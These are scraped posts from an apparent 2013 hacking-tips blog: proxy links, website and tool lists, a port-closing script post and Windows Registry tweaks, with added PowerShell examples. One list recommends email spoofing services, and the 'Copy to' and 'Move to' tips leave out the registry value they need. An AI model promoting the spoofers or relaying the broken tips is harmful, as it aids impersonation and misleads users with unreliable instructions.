6. Zend2 => <a href="http://www.zend2.com/" target="_blank">zend2</a><br /><br />
7. NewIPNow => <a href="http://www.newipnow.com/" target="_blank">newipnow</a><br /><br />
8. KProxy => <a href="http://www.kproxy.com/" target="_blank">kproxy</a><br /><br />
9. Mega Proxy => <a href="https://www.megaproxy.com/freesurf/" target="_blank">megaproxy</a><br /><br />
10. AD Free Proxy => <a href="http://www.adfreeproxy.com/" target="_blank">adfreeproxy</a></div>
Pprasoon, 2013-09-17T13:17:00.003-07:00: 10 Free Online Tools Must Know<div dir="ltr" style="text-align: left;" trbidi="on">
10 Free Online Tools You Must Know<br />
<br />
1. Emkei’s Mailer (http://emkei.cz/) : Email spoofer<br />
<br />
2. GuerrillaMail (http://guerrillamail.com/) : Email spoofer - better than Emkei's Mailer<br />
<br />
3. Cloud9 (http://cloud9.io/) : Your online IDE for editing code from any PC<br />
<br />
4. Ideone.com (http://ideone.com/) : Test your code in almost all languages.<br />
<br />
5. TextMechanic (http://textmechanic.com/) : Format your text, all at one site<br />
<br />
6. Crypo (http://crypo.in.ua/tools/) : Compilation of all encryption/decryption tools in one place.<br />
<br />
7. WebSniffer (http://web-sniffer.net/) : Check the headers / HTTP response of a request<br />
<br />
8. Ping.eu (http://ping.eu/) : ping / speed test / DNS lookup<br />
<br />
9. Plus.im (https://plus.im/) : All IM, online<br />
<br />
10. Mail2Web (https://mail2web.com/login/) : Accessing POP3 email online</div>
Pprasoon, 2013-09-02T11:38:00.000-07:00: List Of 105 Useful Websites for Every Reader<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<span style="font-size: large;">1. screenr.com – Record movies of your desktop and send them straight to YouTube.<br /><br />
2. bounceapp.com – For capturing full length screenshots of web pages.<br /><br />
3. goo.gl – Shorten long URLs and convert URLs into QR codes.<br /><br />
4. untiny.me – Find the original URL that’s hiding behind a short URL.<br /><br />
5. localti.me – Know more than just the local time of a city.<br /><br />
6. copypastecharacter.com – Copy-paste special characters that aren’t on your keyboard.<br /><br />
7. topsy.com – A better search engine for Twitter.<br /><br />
8. fb.me/AppStore – Search iOS apps without launching iTunes.<br /><br />
9. iconfinder.com – The best place to find icons of all sizes.<br /><br />
10. office.com – Download templates, clip art and images for your Office documents.<br /><br />
11. woorank.com – Everything you wanted to know about a website.<br /><br />
12. virustotal.com – Scan any suspicious file or email attachment for viruses.<br /><br />
13. wolframalpha.com – Get answers directly without searching.<br /><br />
14. printwhatyoulike.com – Print web pages without the clutter.<br /><br />
15. joliprint.com – Reformats news articles and blog content as a newspaper.<br /><br />
16. isnsfw.com – When you wish to share a NSFW page but with a warning.<br /><br />
17. eggtimer.com – A simple online timer for your daily needs.<br /><br />
18. coralcdn.org – If a site is down due to heavy traffic, try accessing it through Coral CDN.<br /><br />
19. random.org – Pick random numbers, flip coins, and more.<br /><br />
20. mywot.com – Check the trust level of any website.<br /><br />
21. viewer.zoho.com – Preview PDFs and presentations directly in the browser.<br /><br />
22. tubemogul.com – Simultaneously upload videos to YouTube and other video sites.<br /><br />
23. truveo.com – The best place for searching web videos.<br /><br />
24. scr.im – Share your email address online without worrying about spam.<br /><br />
25. spypig.com – Now get read receipts for your email.<br /><br />
26. sizeasy.com – Visualize and compare the size of any product.<br /><br />
27. whatfontis.com – Quickly determine the font name from an image.<br /><br />
28. fontsquirrel.com – A good collection of fonts – free for personal and commercial use.<br /><br />
29. regex.info – Find data hidden in your photographs.<br /><br />
30. tineye.com – This is like an online version of Google Goggles.<br /><br />
31. iwantmyname.com – Helps you search domains across all TLDs.<br /><br />
32. tabbloid.com – Your favorite blogs delivered as PDFs.<br /><br />
33. join.me – Share your screen with anyone over the web.<br /><br />
34. onlineocr.net – Recognize text from scanned PDFs and images – see other OCR tools.<br /><br />
35. flightstats.com – Track flight status at airports worldwide.<br /><br />
36. wetransfer.com – For sharing really big files online.<br /><br />
37. pastebin.com – A temporary online clipboard for your text and code snippets.<br /><br />
38. polishmywriting.com – Check your writing for spelling or grammatical errors.<br /><br />
39. awesomehighlighter.com – Easily highlight the important parts of a web page.<br /><br />
40. typewith.me – Work on the same document with multiple people.<br /><br />
41. whichdateworks.com – Planning an event? Find a date that works for all.<br /><br />
42. everytimezone.com – A less confusing view of the world time zones.<br /><br />
43. warrick.cs.odu.edu – You’ll need this when your bookmarked web pages are deleted.<br /><br />
44. gtmetrix.com – The perfect tool for measuring your site performance online.<br /><br />
45. imo.im – Chat with your buddies on Skype, Facebook, Google Talk, etc. from one place.<br /><br />
46. translate.google.com – Translate web pages, PDFs and Office documents.<br /><br />
47. youtube.com/leanback – Sit back and enjoy YouTube videos in full-screen mode.<br /><br />
48. similarsites.com – Discover new sites that are similar to what you like already.<br /><br />
49. wordle.net – Quickly summarize long pieces of text with tag clouds.<br /><br />
50. bubbl.us – Create mind-maps, brainstorm ideas in the browser.<br /><br />
51. kuler.adobe.com – Get color ideas, also extract colors from photographs.<br /><br />
52. followupthen.com – Set up quick reminders via email itself.<br /><br />
53. lmgtfy.com – When your friends are too lazy to use Google on their own.<br /><br />
54. tempalias.com – Generate temporary email aliases, better than disposable email.<br /><br />
55. pdfescape.com – Lets you quickly edit PDFs in the browser itself.<br /><br />
56. faxzero.com – Send an online fax for free – see more fax services.<br /><br />
57. feedmyinbox.com – Get RSS feeds as an email newsletter.<br /><br />
58. isendr.com – Transfer files without uploading to a server.<br /><br />
59. tinychat.com – Set up a private chatroom in micro-seconds.<br /><br />
60. privnote.com – Create text notes that will self-destruct after being read.<br /><br />
61. flightaware.com – Live flight tracking service for airports worldwide.<br /><br />
62. boxoh.com – Track the status of any shipment on Google Maps – alternative.<br /><br />
63. chipin.com – When you need to raise funds online for an event or a cause.<br /><br />
64. downforeveryoneorjustme.com – Is your favorite site really offline?<br /><br />
65. example.com – This website can be used as an example in documentation.<br /><br />
66. whoishostingthis.com – Find the web host of any website.<br /><br />
67. google.com/history – Found something on Google but can’t remember it now?<br /><br />
68. errorlevelanalysis.com – Find whether a photo is real or a photoshopped one.<br /><br />
69. google.com/dictionary – Get word meanings, pronunciations and usage examples.<br /><br />
70. urbandictionary.com – Find definitions of slang and informal words.<br /><br />
71. seatguru.com – Consult this site before choosing a seat for your next flight.<br /><br />
72. sxc.hu – Download stock images absolutely free.<br /><br />
73. download.com.np – Get all software.<br /><br />
74. wobzip.org – Unzip your compressed files online.<br /><br />
75. vocaroo.com – Record your voice with a click.<br /><br />
76. scribblemaps.com – Create custom Google Maps easily.<br /><br />
77. buzzfeed.com – Never miss another Internet meme or viral video.<br /><br />
78. alertful.com – Quickly set up email reminders for important events.<br /><br />
79. encrypted.google.com – Prevent your ISP and boss from reading your search queries.<br /><br />
80. formspring.me – You can ask or answer personal questions here.<br /><br />
81. snopes.com – Find if that email offer you received is real or just another scam.<br /><br />
82. typingweb.com – Master touch-typing with these practice sessions.<br /><br />
83. mailvu.com – Send video emails to anyone using your webcam.<br /><br />
84. ge.tt – Quickly send a file to someone, they can even preview it before downloading.<br /><br />
85. timerime.com – Create timelines with audio, video and images.<br /><br />
86. stupeflix.com – Make a movie out of your images, audio and video clips.<br /><br />
87. aviary.com/myna – An online audio editor that lets you record and remix audio clips.<br /><br />
88. noteflight.com – Print music sheets, write your own music online (review).<br /><br />
89. disposablewebpage.com – Create a temporary web page that self-destructs.<br /><br />
90. namemytune.com – When you need to find the name of a song.<br /><br />
91. homestyler.com – Design from scratch or re-model your home in 3D.<br /><br />
92. snapask.com – Use email on your phone to find sports scores, read Wikipedia, etc.<br /><br />
93. teuxdeux.com – A beautiful to-do app that resembles a paper diary.<br /><br />
94. livestream.com – Broadcast events live over the web, including your desktop screen.<br /><br />
95. bing.com/images – Automatically find perfectly-sized wallpapers for mobiles.<br /><br />
96. historio.us – Preserve complete web pages with all the formatting.<br /><br />
97. dabbleboard.com – Your virtual whiteboard.<br /><br />
98. whisperbot.com – Send an email without using your own account.<br /><br />
99. sumopaint.com – An excellent layer-based online image editor.<br /><br />
100. lovelycharts.com – Create flowcharts, network diagrams, sitemaps, etc.<br /><br />
101. nutshellmail.com – Get your Facebook and Twitter streams in your inbox.<br /><br />
102. The Hype Machine (http://hypem.com/) – Web-based music discovery site based on the music posted to blogs.<br /><br />
103. SimpleWash – A site to help you clean up old content you may not want to show on your social media profiles anymore (currently Facebook only, Twitter is coming soon).<br /><br />
104. ListenToYouTube.com – Converts YouTube videos to MP3s.<br /><br />
105. PushBullet – Easily send notes, links, lists, files, etc. to your Android phone.</span></div>
Pprasoon, 2013-08-21T12:45:00.000-07:00: Notification to readers <div dir="ltr" style="text-align: left;" trbidi="on">
Our team, the Pprasoon Nigam Blogspot team, is sorry that no new updates have been made in the last few months. <br />
The reason is that we are working on something which is very SECRET. <br />
<br />
But this secret will be revealed soon. <br />
<br />
You will be getting more benefits of hacking, plus an easier way to learn, study and practice it (hacking) ...... so please have patience and keep in touch with us. For any help, get to our Facebook account: <br />
<br />
to go to my account ===> <a href="https://www.facebook.com/pprasoon.nigam" target="_blank">Facebook Pprasoon nigam</a><br />
<br />
Till then, be safe and stay connected. <br />
<br />
Regards, <br />
Pprasoon Nigam Blogspot team </div>
Pprasoon, 2013-08-21T12:38:00.003-07:00: How To Close Ports<div dir="ltr" style="text-align: left;" trbidi="on">
<h2>
How To Close Ports</h2>
<br />
So I've been looking for a while at just how to close a port on a computer. I simply<br />
couldn't find a way. Well, I finally found it. This'll only work for Windows users (unless<br />
your Unix-version OS has netsh).<br />
It's actually quite simple. Here's the command for it:<br />
<br />
netsh firewall delete portopening TCP portnumber<br />
It's that simple. Simply go to START -> RUN -> and type in that command up there,<br />
and it'll close it for you.<br />
<br />
Or, you can also open up the command prompt (START -> RUN -> CMD) and type in "netsh"<br />
without the quotes to get to your Windows Firewall settings.<br />
However, since I'm such a nice guy, I wrote it all out in a VBS script for you so that it's<br />
automatically runnable, as well as a batch script. So here you are:<br />
=============================<br />
.VBS Script<br />
' Ask for the port, start an interactive netsh session and type the command into it.<br />
' SendKeys goes to whichever window has focus, so do not touch the keyboard while it runs.<br />
set ss = createobject("wscript.shell")<br />
set ws = wscript<br />
dim PORT<br />
PORT = InputBox("Enter the port you wish to close:")<br />
' Refuse anything that is not a number in the valid TCP port range before typing it into netsh.<br />
If Not IsNumeric(PORT) Then ws.Quit 1<br />
If CLng(PORT) < 1 Or CLng(PORT) > 65535 Then ws.Quit 1<br />
ss.run "netsh.exe"<br />
ws.sleep 1000<br />
ss.sendkeys "firewall delete portopening TCP " & PORT<br />
ss.sendkeys "{enter}"<br />
ws.sleep 500<br />
'ss.sendkeys "exit"<br />
'ss.sendkeys "{enter}"<br />
================================<br />
.BAT Script<br />
@echo off<br />
title Port Closer<br />
echo Port Closer<br />
echo.<br />
rem Read the port number from the user and hand it to netsh (the command, not an interactive session)<br />
set /p port=Type the port number you wish to close here:<br />
netsh firewall delete portopening TCP %port%<br />
rem msg /w waits until the user acknowledges the pop-up before the window closes<br />
msg /w * Port %port% has been closed.<br />
exit</div>
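The `netsh firewall` context used above is the Windows XP-era firewall interface; Windows Vista and later replaced it with `netsh advfirewall`, and the same rule store is reachable from PowerShell through the NetSecurity module. The script below is an added example, not the post's own VBS or batch script, showing how a defender would do the same job on Windows 8 / Server 2012 or later: it validates the port number before touching anything, finds the inbound allow rules that open that TCP port, removes them, and then reports whether a process is still listening, because deleting a firewall rule does not stop the service behind it. It assumes an elevated PowerShell session; the file name `Close-TcpPort.ps1` is just a suggestion.

```powershell
<#
 Added example (not from the original post): close a TCP port on Windows 8 /
 Server 2012 or later by removing the inbound allow rules that open it.
 Uses the NetSecurity module instead of the deprecated "netsh firewall"
 context shown in the post. Assumes an elevated PowerShell session.
 Usage:  .\Close-TcpPort.ps1 -Port 3389 -WhatIf   (dry run, lists what would go)
         .\Close-TcpPort.ps1 -Port 3389           (delete the rules)
#>
[CmdletBinding(SupportsShouldProcess = $true)]
param(
    [Parameter(Mandatory = $true)]
    [ValidateRange(1, 65535)]   # rejects "abc", 0 or 70000 before we touch the firewall
    [int]$Port
)

# Every firewall rule carries a port filter. Walk the TCP port filters whose
# LocalPort is exactly this port, map them back to their rules, and keep only
# inbound allow rules, since those are the ones that actually "open" the port.
$rules = Get-NetFirewallPortFilter -Protocol TCP |
    Where-Object { $_.LocalPort -eq "$Port" } |
    Get-NetFirewallRule |
    Where-Object { $_.Direction -eq 'Inbound' -and $_.Action -eq 'Allow' }

if (-not $rules) {
    Write-Host "No inbound allow rule opens TCP port $Port; nothing to delete."
} else {
    foreach ($rule in $rules) {
        # ShouldProcess gives us -WhatIf / -Confirm for free
        if ($PSCmdlet.ShouldProcess($rule.DisplayName, "Remove firewall rule")) {
            Write-Host "Removing rule '$($rule.DisplayName)' (profile: $($rule.Profile))"
            Remove-NetFirewallRule -Name $rule.Name
        }
    }
}

# Removing the rule does not stop the listener; the port is blocked only as long
# as the profile's default inbound action is Block. Show what is still bound to
# it so the operator can decide whether to stop or reconfigure that service.
$listeners = Get-NetTCPConnection -State Listen -LocalPort $Port -ErrorAction SilentlyContinue
foreach ($conn in $listeners) {
    $proc = Get-Process -Id $conn.OwningProcess -ErrorAction SilentlyContinue
    Write-Host ("Still listening on {0}:{1} -> PID {2} ({3})" -f
        $conn.LocalAddress, $conn.LocalPort, $conn.OwningProcess, $proc.ProcessName)
}
```

Run it with `-WhatIf` first: it prints each rule that would be removed without changing anything, which is the check you want before deleting rules on a server you do not fully own. `Get-NetFirewallProfile` will show you the default inbound action per profile if the final report suggests the port is still reachable.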
Pprasoon, 2013-04-28T10:08:00.000-07:00: 20 little tricks and hacks for all Windows O.S<div dir="ltr" style="text-align: left;" trbidi="on">
<!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; mso-outline-level: 1;">
<span style="font-size: x-large;"><b><span style="color: black; font-family: 'Times New Roman', serif; font-size: 24.0pt; mso-fareast-font-family: 'Times New Roman'; mso-font-kerning: 18.0pt;">20 tricks and hacks for all Windows O.S.</span></b></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; mso-outline-level: 3;">
<span style="font-size: x-large;"><b><span style="color: black; font-family: 'Times New Roman', serif; font-size: 13.5pt; mso-fareast-font-family: 'Times New Roman';">PC &amp; laptop to make it run the way you want</span></b></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="color: black; font-family: 'Times New Roman', serif; font-size: 12.0pt; mso-fareast-font-family: 'Times New Roman';"><br /></span></div>
Let's take you through the hidden tweaks in Windows.<br />
<br />
Tweaking enables you to make Windows do interesting and useful things that it doesn't necessarily do directly out of the box.<br />
<br />
Some tweaks are easier to action than others but all of them help you to customize your PC and make it run closer to the way you'd like.<br />
<br />
HERE'S THE SECRET<br />
<br />
1. Remove programs from Open with…<br />
<br />
You can remove unwanted programs that appear on the Open with… list when you're trying to open a file Windows doesn't recognise.<br />
<br />
In the Registry, browse to HKEY_CLASSES_ROOT\Applications and you'll see a list of programs installed on your PC as subkeys in the left-hand pane.<br />
<br />
To remove an unwanted program from this list, select it and then right-click in the right-hand pane. Choose New > String Value, and name it "NoOpenWith".<br />
<br />
<br />
2. Copy to folder<br />
<br />
Add a "Copy to folder" option to the context menu so you can right-click a file to quickly copy it.<br />
<br />
In Registry Editor, browse to HKEY_CLASSES_ROOT\AllFilesystemObjects\shellex\ContextMenuHandlers, and create a new key called Copy to.<br />
<br />
Change its (Default) value to "" and check it works.<br />
<br />
<br />
<br />
3. Move to folder<br />
<br />
You can also add a "Move to folder" option in this way.<br />
<br />
From the same ContextMenuHandlers key as in tip 2, create a new key called "Move to" and change its (Default) value to "".<br />
<br />
4. Quick folder Properties<br />
<br />
To move quickly to a folder's Properties dialog, hold down [Alt] while you double-click it.<br />
<br />
<br />
5. Correct file sorting<br />
<br />
By default, a file named 2.jpg is sorted after one called 20.jpg. Many people work around this by starting single-digit numbers in file names with a leading zero, but you can change this behaviour by making a Registry edit.<br />
<br />
Browse to the Registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer.<br />
<br />
Then create a new DWORD value and name it "NoStrCmpLogical". Right-click it, choose Modify and set its value to "1".<br />
<br />
6. Change the mouse pointer in Vista and Windows 7<br />
<br />
Right-click the desktop and choose Personalize > Mouse Pointers. Select the scheme you want to use from the drop-down list. You can modify individual pointers by selecting one in the current scheme and clicking Browse – then replace this with any static cursor file with the extension .CUR, or an animated cursor file, which will have the .ANI file extension.<br />
<br />
You can also download sets of mouse pointers online. These are generally distributed in sets of .CUR or .ANI files, grouped together in a zip archive. Download the file, unzip it and then replace the pointers you want to change with the new files, as in the tip above. A good place to start looking is here.<br />
<br />
You can also make your own cursor files by creating suitable bitmap images in a graphics program and saving them with the .CUR extension.<br />
<br />
<br />
7. Mouse pointers in XP<br />
<br />
To change the mouse pointer scheme in Windows XP, open Control Panel and switch to Classic View. Double-click Mouse and choose the Pointer tab.<br />
<br />
8. Send To expansion<br />
<br />
When you right-click a file or folder in Windows 7 and choose Send To, there's a limited number of options. But hold down [Shift] as you right-click and you'll open an expanded menu containing My Documents, Downloads and more useful locations.<br />
<br />
9. Edit your theme<br />
<br />
Right-click anywhere on the desktop and choose Personalize > Theme. Select an option from the drop-down list to use an existing theme.<br />
<br />
Alternatively, choose "Window Colour and Appearance", open the Classic Appearance dialog to select a classic scheme and modify fonts and colours. Click Advanced. Pick the item you want to modify and enter the new colour or font. <br />
<br />
10. Folder toolbar<br />
<br />
This tweak enables you to turn any folder on your hard drive into a toolbar, similar to the Quick Launch toolbar, that gives you quick and easy access to the folder's contents.<br />
<br />
First, minimise all your open windows, then move the mouse pointer to the Taskbar and right-click it. Choose Toolbars > New Toolbar from the expanding menu, which will launch the New Toolbar dialog.<br />
<br />
Now select the item you want to use as a toolbar. If necessary, browse through My Documents or My Computer to find the folder you want. Alternatively, you can click "Make new folder" to create a custom one with specific contents.<br />
<br />
Click OK and your new toolbar appears as a button on the Windows Taskbar; click it to see an expanding menu of its contents. Sub-folders also become their own expanding menus, and you can then select a particular file to open it in its associated application.<br />
<br />
11. Active windows<br />
<br />
Press [Alt] + [Esc] to cycle through your active items in the order in which they were opened. Then press [Alt] + [Tab] to pick the window you want to work on.<br />
<br />
12. Hanging time<br />
<br />
By default, Windows waits for five seconds to allow time for any hung applications to be closed when you shut down your computer.<br />
<br />
If you want to reduce this period of time slightly, you can change the length with a quick Registry edit, so browse to HKEY_CURRENT_USER\Control Panel\Desktop. In Vista, create a string entry called "HungAppTimeout" (if you use XP, it's already there).<br />
<br />
Right-click this and choose Modify. The number is in milliseconds, so the default of 5000 equates to a wait of five seconds. If you're using Windows 7, you should avoid using this tweak, because it causes glitches.<br />
<br />
13. Tweak performance<br />
<br />
1. Best performance<br />
<br />
Choose Start, right-click Computer and go to Properties > Advanced system settings. In Performance, click Settings > Visual Effects. Tick "Adjust for best performance". This removes most animations to improve PC performance.<br />
<br />
2. Processor scheduling<br />
<br />
In the Advanced tab, both Processor Scheduling and Memory usage are optimised for programs' performance. Change to Background services and System cache if you use your PC as a server, and programs' performance is secondary.<br />
<br />
3. Virtual memory<br />
<br />
In Virtual Memory, click Change > Custom size, and enter an upper and lower limit for your virtual memory. Try one and a half times the amount of RAM as your lower limit, and two to three times your RAM for the upper limit.<br />
<br />
14. Disable paging file<br />
<br />
If you're running a 64-bit version of Windows, have more than 4GB RAM installed, and don't perform memory-intensive operations, you could improve performance by disabling the paging file. In "Advanced system settings", choose Performance > Advanced, click Change under Virtual memory and choose "No paging file".<br />
<br />
15. Clear paging file at shutdown<br />
<br />
Windows uses the paging file on your hard drive as if it were RAM, and this routinely holds temporary data to free up your RAM. When you shut down your PC, this file is normally preserved, which can lead to inefficiency, because it slowly clutters up your system.<br />
<br />
If your data is sensitive, this is also a security risk: data that was paged out from memory can remain readable on disk even after you've deleted or destroyed the files it came from.<br />
<br />
This edit flushes out the swap file whenever you shut down. Open the Registry Editor and browse to the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management.<br />
<br />
This contains a number of configurations for RAM and virtual memory. Either create or modify the DWORD value called "ClearPageFileAtShutdown", which defines whether the memory flush happens. To turn it on, set the value to "1".<br />
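The Registry edits from tips 1, 5, 12 and 15 done from PowerShell, as an added example that is not part of the original post: each value's previous state is written to a CSV before the change and the new value is read back to confirm the write landed. The backup file location and the example.exe subkey name are assumptions, and the HKLM write needs an elevated prompt.<br />

```powershell
# Added example (not from the original post). Run in an elevated PowerShell.

# HKCR is not a default PowerShell drive; map it so tip 1 can use it.
if (-not (Get-PSDrive -Name HKCR -ErrorAction SilentlyContinue)) {
    New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null
}

function Set-RegistryTweak {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [Parameter(Mandatory)] [string] $Name,
        [Parameter(Mandatory)] [AllowEmptyString()] $Value,
        [ValidateSet('DWord', 'String')] [string] $Type = 'DWord',
        [string] $BackupFile = "$env:TEMP\tweak-backup.csv"   # assumed location
    )
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }

    # Record the previous value (or its absence) so the tweak can be reverted later.
    $old = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Path     = $Path
        Name     = $Name
        OldValue = if ($old) { $old.$Name } else { '<absent>' }
        When     = (Get-Date).ToString('s')
    } | Export-Csv -Path $BackupFile -Append -NoTypeInformation

    if ($old) {
        Set-ItemProperty -Path $Path -Name $Name -Value $Value
    } else {
        New-ItemProperty -Path $Path -Name $Name -Value $Value -PropertyType $Type | Out-Null
    }

    # Read the value back; a silent failure here would leave you believing a tweak is active.
    $now = (Get-ItemProperty -Path $Path -Name $Name).$Name
    if ("$now" -ne "$Value") { throw "Verification failed for $Path\$Name (got '$now')" }
    "$Path\$Name = '$now'"
}

# Tip 1: hide one program from the Open with... list. The subkey must already exist;
# example.exe is a placeholder for a real entry under Applications.
$app = 'HKCR:\Applications\example.exe'
if (Test-Path $app) { Set-RegistryTweak -Path $app -Name 'NoOpenWith' -Value '' -Type String }

# Tip 5: sort 2.jpg before 20.jpg by switching Explorer to plain string comparison.
Set-RegistryTweak -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer' `
                  -Name 'NoStrCmpLogical' -Value 1

# Tip 12: shorten the hung-application wait (milliseconds, stored as a string).
# The post advises against this one on Windows 7.
Set-RegistryTweak -Path 'HKCU:\Control Panel\Desktop' -Name 'HungAppTimeout' -Value '4000' -Type String

# Tip 15: wipe the paging file at shutdown so paged-out data does not linger on disk.
Set-RegistryTweak -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management' `
                  -Name 'ClearPageFileAtShutdown' -Value 1
```

To undo a tweak, look up the row for it in the backup CSV and write the OldValue back with Set-ItemProperty, or remove the value if it was recorded as absent.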
<br />
16. Quick access to Task Manager<br />
<br />
You may be used to accessing Task Manager by pressing [Ctrl] + [Alt] + [Del] and then selecting it from the resulting screen. You can also get quick access to it that's less intrusive, however – right-click the Taskbar and choose Task Manager.<br />
<br />
17. Change user picture<br />
<br />
Click the Start button and then click your user picture. In the resulting dialog, choose Change your picture > Browse for more pictures. Locate the photo you want to use and click OK. Click Change Picture, followed by OK to confirm your choice.<br />
<br />
18. Autohide the Taskbar<br />
<br />
You can free up more screen space by hiding the Taskbar. Right-click it, choose Properties and select Auto-hide. To access it when you want it, just drag the mouse to the bottom of your screen and it'll pop up.<br />
<br />
